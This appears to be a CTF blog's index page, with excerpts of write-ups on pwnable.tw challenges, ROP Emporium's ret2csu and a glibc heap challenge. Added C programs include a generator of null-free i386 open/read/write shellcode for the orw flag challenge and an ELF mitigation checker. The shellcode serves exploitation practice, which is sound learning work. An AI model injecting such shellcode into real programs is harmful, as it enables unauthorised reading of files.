Categories
advanced glibc heap

one_byte

Ramblings A while back I took an online class on glibc’s heap. It’s taught by Max Kamper, the same guy who did ROP emporium, who is an amazing teacher. I’d highly recommend this class if you’re interested in the glibc heap, or how heaps work in general. The last challenge of part one took me […]

Categories
ROP ROP emporium

ret2csu

This was the last challenge from Max Kamper’s ROP Emporium. It wasn’t especially hard, but it teaches a strategy that’s extremely useful for ROP attacks that (supposedly) works universally on most Linux binaries. To start, all ROP emporium levels have the same basic buffer overflow to overwrite the return address. The site says the objective […]

Categories
basic pwnable.tw

calc

This program lets you do math to numbers. It seems to be more secure than the last: Note the stack canaries; unless we have a leak, we can’t just overflow everything up to the return address. We also can’t jump to the stack. However, notice that this binary doesn’t have PIE enabled, making ROP gadgets […]

Categories
basic pwnable.tw

orw

This binary gives up its restraints in the description: If we decompile the binary with ghidra, we can see it literally just accepts and calls our shellcode. To figure out how Linux syscalls work in assembly, you can use this for reference. Just put the correct value in each register then call int 0x80, and […]
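The register convention the excerpt refers to is the i386 `int 0x80` ABI: `eax` holds the syscall number and the arguments go in `ebx`, `ecx`, `edx`, `esi`, `edi`, `ebp`; `int 0x80` changes only `eax` (the return value). The following generator is an added example, not code from the post or from pwnable.tw: it emits null-free open/read/write/exit shellcode for an arbitrary absolute path, padding the path with leading `/` characters so it can be pushed in whole 4-byte chunks without a 0x00 filler. The flag path `/home/orw/flag` and the 128-byte read size are assumptions; the bytes target a 32-bit x86 Linux process, so a 64-bit host can build and inspect them but not execute them.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* i386 Linux syscall numbers (32-bit table). int 0x80 ABI: eax = number,
 * args in ebx, ecx, edx, esi, edi, ebp; only eax is clobbered (return value). */
#define SYS_EXIT  1
#define SYS_READ  3
#define SYS_WRITE 4
#define SYS_OPEN  5

static int emit(uint8_t *out, size_t cap, size_t *n, const uint8_t *b, size_t len) {
    if (*n + len > cap) return -1;
    memcpy(out + *n, b, len);
    *n += len;
    return 0;
}
#define EMIT(...) do { const uint8_t b_[] = { __VA_ARGS__ }; \
                       if (emit(out, cap, &n, b_, sizeof b_)) return -1; } while (0)

/* Builds null-free i386 shellcode equivalent to:
 *   fd = open(path, O_RDONLY); n = read(fd, esp, 0x80); write(1, esp, n); exit(0);
 * Returns the length in bytes, or -1 if the path is not absolute, the padded
 * path is too long, or the output buffer is too small. Assumes open() succeeds
 * and returns a small fd (so "mov al, 3" leaves the upper bytes of eax zero). */
int build_orw_shellcode(const char *path, uint8_t *out, size_t cap) {
    size_t n = 0, len = strlen(path);
    if (len == 0 || path[0] != '/') return -1;
    /* Pad to a multiple of 4 with leading slashes: "//x" names the same file as
     * "/x", and we avoid a 0x00 filler that would truncate a strcpy-style copy. */
    char padded[256];
    size_t pad = (4 - len % 4) % 4;
    if (len + pad >= sizeof padded) return -1;
    memset(padded, '/', pad);
    memcpy(padded + pad, path, len + 1);
    size_t plen = len + pad;

    EMIT(0x31, 0xc0);                     /* xor eax, eax                          */
    EMIT(0x50);                           /* push eax        ; NUL terminator      */
    for (size_t i = plen; i > 0; i -= 4)  /* push the path 4 bytes at a time, last chunk first */
        EMIT(0x68, (uint8_t)padded[i - 4], (uint8_t)padded[i - 3],
                   (uint8_t)padded[i - 2], (uint8_t)padded[i - 1]);   /* push imm32 */
    EMIT(0x89, 0xe3);                     /* mov ebx, esp    ; pathname            */
    EMIT(0x31, 0xc9);                     /* xor ecx, ecx    ; flags = O_RDONLY    */
    EMIT(0x31, 0xd2);                     /* xor edx, edx    ; mode = 0            */
    EMIT(0xb0, SYS_OPEN);                 /* mov al, 5                             */
    EMIT(0xcd, 0x80);                     /* int 0x80        ; eax = fd            */

    EMIT(0x89, 0xc3);                     /* mov ebx, eax    ; fd                  */
    EMIT(0x89, 0xe1);                     /* mov ecx, esp    ; buffer (path is no longer needed) */
    EMIT(0xb2, 0x80);                     /* mov dl, 0x80    ; count; edx upper bytes still zero */
    EMIT(0xb0, SYS_READ);                 /* mov al, 3                             */
    EMIT(0xcd, 0x80);                     /* int 0x80        ; eax = bytes read    */

    EMIT(0x89, 0xc2);                     /* mov edx, eax    ; count = bytes read  */
    EMIT(0x31, 0xdb);                     /* xor ebx, ebx                          */
    EMIT(0x43);                           /* inc ebx         ; fd = 1 (stdout)     */
    EMIT(0xb0, SYS_WRITE);                /* mov al, 4       ; ecx still = buffer  */
    EMIT(0xcd, 0x80);                     /* int 0x80                              */

    EMIT(0xb0, SYS_EXIT);                 /* mov al, 1                             */
    EMIT(0x31, 0xdb);                     /* xor ebx, ebx    ; status = 0          */
    EMIT(0xcd, 0x80);                     /* int 0x80                              */
    return (int)n;
}

/* 1 if no byte is 0x00 (safe for string-copying input paths), else 0. */
int shellcode_is_null_free(const uint8_t *sc, int len) {
    for (int i = 0; i < len; i++)
        if (sc[i] == 0) return 0;
    return 1;
}

int main(void) {
    uint8_t sc[128];
    /* Assumed flag location for this demonstration. */
    int n = build_orw_shellcode("/home/orw/flag", sc, sizeof sc);
    if (n < 0) { fputs("could not build shellcode\n", stderr); return 1; }
    printf("%d bytes, null-free: %s\n", n, shellcode_is_null_free(sc, n) ? "yes" : "no");
    for (int i = 0; i < n; i++) printf("\\x%02x", sc[i]);
    putchar('\n');
    return 0;
}
```

The printed `\xNN` string can be dropped straight into a pwntools `send()`; changing the path only changes the run of `push imm32` instructions, everything after them is fixed.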

Categories
basic pwnable.tw

start

This is the first challenge of pwnable.tw. Fitting to its name, it requires some basic knowledge of buffer overflows and x86 assembly. First, let’s see what kind of security it has built in: Notice how the stack is executable, and there are no stack canaries. This will come into play later. We can disassemble the program […]
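Both the calc and start write-ups open by checking which mitigations the binary was built with (executable stack, stack canaries, PIE). The program below is an added example, not code from the blog or from pwnable.tw, showing where those answers actually live in the ELF file: PIE is `e_type == ET_DYN`, NX is the `PF_X` bit of the `PT_GNU_STACK` program header (a missing `PT_GNU_STACK` is reported as executable, the conservative reading that checksec-style tools also use), and canaries are detected heuristically by searching the image for the `__stack_chk_fail` string rather than by walking the dynamic symbol table. The `make_test_elf` helper constructs minimal, non-loadable ELF images for testing; they are stand-ins for the challenge binaries, not the real files.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PT_GNU_STACK 0x6474e551u
#define PF_X 0x1u
#define ET_DYN 3

struct mitigations {
    int valid;   /* parsed as a little-endian ELF32/ELF64 image            */
    int pie;     /* e_type == ET_DYN: random base, so gadget addresses move */
    int nx;      /* PT_GNU_STACK present and not executable                 */
    int canary;  /* heuristic: "__stack_chk_fail" appears in the image      */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static uint64_t rd64(const uint8_t *p) { return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32); }

static int contains(const uint8_t *buf, size_t len, const char *needle) {
    size_t nl = strlen(needle);
    for (size_t i = 0; i + nl <= len; i++)
        if (memcmp(buf + i, needle, nl) == 0) return 1;
    return 0;
}

struct mitigations inspect_elf(const uint8_t *buf, size_t len) {
    struct mitigations m = {0, 0, 0, 0};
    /* Magic, then EI_CLASS (1 = ELF32, 2 = ELF64) and EI_DATA (1 = little-endian). */
    if (len < 52 || memcmp(buf, "\x7f" "ELF", 4) != 0 || buf[5] != 1) return m;
    int is64 = (buf[4] == 2);
    if (is64 && len < 64) return m;
    m.valid = 1;
    m.pie = (rd16(buf + 16) == ET_DYN);                 /* e_type */
    uint64_t phoff     = is64 ? rd64(buf + 32) : rd32(buf + 28);
    uint16_t phentsize = rd16(buf + (is64 ? 54 : 42));
    uint16_t phnum     = rd16(buf + (is64 ? 56 : 44));
    /* m.nx stays 0 unless a PT_GNU_STACK header without PF_X is found. */
    for (uint16_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phentsize;
        if (phentsize < (is64 ? 56 : 32) || off + phentsize > len) break;
        const uint8_t *ph = buf + off;
        if (rd32(ph) == PT_GNU_STACK) {                 /* p_type */
            uint32_t flags = is64 ? rd32(ph + 4) : rd32(ph + 24);   /* p_flags */
            m.nx = !(flags & PF_X);
        }
    }
    m.canary = contains(buf, len, "__stack_chk_fail");
    return m;
}

/* Constructs a minimal ELF image (header, optional PT_GNU_STACK, optional symbol
 * name) for testing. It is not loadable; it only exercises inspect_elf. */
size_t make_test_elf(uint8_t *out, int is64, uint16_t e_type, int with_gnu_stack,
                     uint32_t stack_flags, int with_canary_symbol) {
    size_t ehsize = is64 ? 64 : 52, phsize = is64 ? 56 : 32;
    memset(out, 0, ehsize + phsize + 32);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = is64 ? 2 : 1; out[5] = 1; out[6] = 1;
    out[16] = (uint8_t)e_type; out[17] = (uint8_t)(e_type >> 8);
    out[18] = is64 ? 0x3e : 0x03;                       /* e_machine: x86-64 / i386 */
    size_t n = ehsize;
    if (with_gnu_stack) {
        if (is64) { out[32] = (uint8_t)ehsize; out[54] = (uint8_t)phsize; out[56] = 1; }
        else      { out[28] = (uint8_t)ehsize; out[42] = (uint8_t)phsize; out[44] = 1; }
        uint8_t *ph = out + ehsize;
        ph[0] = 0x51; ph[1] = 0xe5; ph[2] = 0x74; ph[3] = 0x64;   /* PT_GNU_STACK */
        ph[is64 ? 4 : 24] = (uint8_t)stack_flags;
        n += phsize;
    }
    if (with_canary_symbol) { memcpy(out + n, "__stack_chk_fail", 16); n += 16; }
    return n;
}

int main(int argc, char **argv) {
    static uint8_t buf[1 << 20];   /* files beyond 1 MiB are truncated; headers still parse */
    size_t n;
    if (argc > 1) {
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror(argv[1]); return 1; }
        n = fread(buf, 1, sizeof buf, f);
        fclose(f);
    } else {
        /* No file given: a constructed stand-in with the properties described for 'start'. */
        n = make_test_elf(buf, 0, 2, 1, 0x7, 0);
    }
    struct mitigations m = inspect_elf(buf, n);
    if (!m.valid) { puts("not a little-endian ELF"); return 1; }
    printf("PIE:    %s\nNX:     %s\nCanary: %s\n", m.pie ? "yes" : "no",
           m.nx ? "yes" : "no", m.canary ? "found (heuristic)" : "not found");
    return 0;
}
```

Run it as `./inspect ./start` to check a real binary. The canary check is only a string search: a binary that merely mentions `__stack_chk_fail` in an unrelated string would be a false positive, and a statically linked binary that inlines the check could be a false negative, so treat it as a hint and confirm with `readelf -s` or the disassembly when it matters.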